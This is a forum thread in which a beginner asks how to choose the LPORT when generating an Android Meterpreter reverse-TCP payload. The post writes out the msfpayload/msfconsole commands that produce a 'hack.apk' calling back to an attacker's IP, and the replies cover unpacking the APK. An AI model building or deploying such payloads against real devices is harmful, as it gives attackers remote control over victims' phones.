Help with Metasploit payload creation[kali linux]

Kalikid

Hello,
First off I would like to say hi hak5 forums, love the show and couldnt register with kali's forum so i came here because I would like to educate myself, or be educated by others on some aspects of metasploit/kali

To put it in the simplest terms,
I was creating a payload for android, and I was wondering, how do i know what LPORT to use.
for my first try i tried 446
with the following command :

msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=446 R > hack.apk

and it returned an error that i cant specify exactly(because i dont remember)
but to paraphrase it was something along the lines of :

invalid LPORT option

than i switched it too

msfconsole android/meterpreter/reverse_tcp LHOST=<my.ip.adress> LPORT=443 R > hack.apk

and for some reason that i cant understand port 443 worked.

so back to my question....
How do i know what LPORT to use when creating a payload?

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> - See more at: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.sDSTQbRg.dpuf

• 4 months later...

just a side note, if you do a

$ cp hack.apk hack.apk.zip
$ unzip hack.apk.zip
you can see the files that are created. I think if I remember correctly, port number is just a value in an xml entry. I haven't really messed around with it, but it appears easy to change manually.

Also, you can try

$ msfpayload android/meterpreter/reverse_tcp S
to get more information on a payload Edited by fugu

The 'unzip' command (as any command on UNIX) doesn't give a shit about the extension of a filename, so you could simply run

unzip hack.apk